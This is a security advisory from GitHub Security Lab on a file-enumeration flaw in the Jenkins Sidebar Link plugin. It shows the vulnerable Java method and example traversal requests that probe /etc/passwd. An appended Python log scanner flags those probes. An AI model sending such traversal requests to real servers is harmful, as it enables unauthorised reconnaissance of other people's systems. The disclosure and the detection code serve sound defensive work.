May 25, 2023

GHSL-2023-076: Information disclosure in the Sidebar Link Plug-in for Jenkins - CVE-2023-32985

GitHub Security Lab

Coordinated Disclosure Timeline


Sidebar Link Plug-in for Jenkins 2.2.1 and earlier does not restrict a file path parameter in an HTTP endpoint, allowing authenticated attackers to enumerate arbitrary files on the Jenkins controller file system.


Sidebar Link Plug-in for Jenkins

Tested Version



Filesystem enumeration in (GHSL-2023-076)

The Sidebar Link plugin for Jenkins exposes an HTTP endpoint, doCheckLinkIcon, that receives a value query parameter. The parameter is used to build a filesystem path on the Jenkins controller, whose existence is then checked:


public FormValidation doCheckLinkIcon(@QueryParameter String value) {
    if (StringUtils.isBlank(value)) {
        return FormValidation.warning("The provided icon is blank or empty. Default will be used.");
    } else
        // do not validate if default icon is used
        if (!value.equals(LinkAction.DEFAULT_ICON_NAME)) {
            // value is used verbatim: nothing checks that the resulting path stays under the Jenkins root
            FilePath imageFile = Jenkins.get().getRootPath().child(value);
            try {
                if (!imageFile.exists()) {
                    return FormValidation.error("Image does not exist:  " + imageFile);
                }
            } catch (Exception e) {
                return FormValidation.error(e, "Problem with link icon:  " + value);
            }
        }
    return FormValidation.ok();
}

Since no validation is performed on the parameter, it can contain .. sequences that escape the intended Jenkins root directory. The plugin returns a different message depending on whether the file exists, which allows attackers to enumerate the controller filesystem by sending multiple requests with different paths and filenames.


This issue may lead to information disclosure.


To exploit this issue, attackers could make GET requests to the checkLinkIcon endpoint containing the desired paths to be enumerated.

Example of a negative request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/b

Response: Image does not exist:  /etc/b

Example of a positive request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Response: HTTP 200 OK
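As an added example (not part of the advisory or of the plugin's code), the following Python applies the containment check that doCheckLinkIcon lacks to the value parameter of checkLinkIcon requests found in access-log lines, flagging the probes shown above. The log lines, client addresses and user names are constructed for illustration; the log format is assumed to be NCSA combined style.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# Endpoint suffix taken from the advisory's request URLs.
CHECK_LINK_ICON = "hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon"

# Constructed sample access-log entries (NCSA combined style), not real Jenkins logs.
# Lines 2 and 3 reproduce the negative and positive probes from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - alice [25/May/2023:10:01:02 +0000] "GET /jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=images%2Flogo.png HTTP/1.1" 200 12
10.0.0.9 - bob [25/May/2023:10:01:03 +0000] "GET /jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/b HTTP/1.1" 200 40
10.0.0.9 - bob [25/May/2023:10:01:04 +0000] "GET /jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 8
10.0.0.7 - carol [25/May/2023:10:01:05 +0000] "GET /jenkins/job/test/api/json HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def escapes_root(value):
    """True if value would resolve outside the Jenkins root directory.

    An absolute path or any '..' segment escapes the root; this is the check the
    vulnerable method never performs before calling getRootPath().child(value).
    Backslashes are normalised so Windows-style separators are treated the same way.
    """
    path = PurePosixPath(value.replace("\\", "/"))
    return path.is_absolute() or ".." in path.parts


def flag_traversal_probes(log_text):
    """Return (ip, user, decoded value) for checkLinkIcon requests whose value escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(CHECK_LINK_ICON):
            continue
        # parse_qs percent-decodes each value once, as the servlet container does.
        for value in parse_qs(url.query).get("value", []):
            if escapes_root(value):
                hits.append((m.group("ip"), m.group("user"), value))
    return hits


if __name__ == "__main__":
    for ip, user, value in flag_traversal_probes(SAMPLE_LOG):
        print(f"{ip} ({user}) probed {value}")
```

Both probes are flagged regardless of whether the target file exists, so the detection does not depend on the "Image does not exist" oracle that the attacker relies on.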




This issue was discovered and reported by CodeQL team member @atorralba (Tony Torralba).


You can contact the GHSL team at, please include a reference to GHSL-2023-076 in any communication regarding this issue.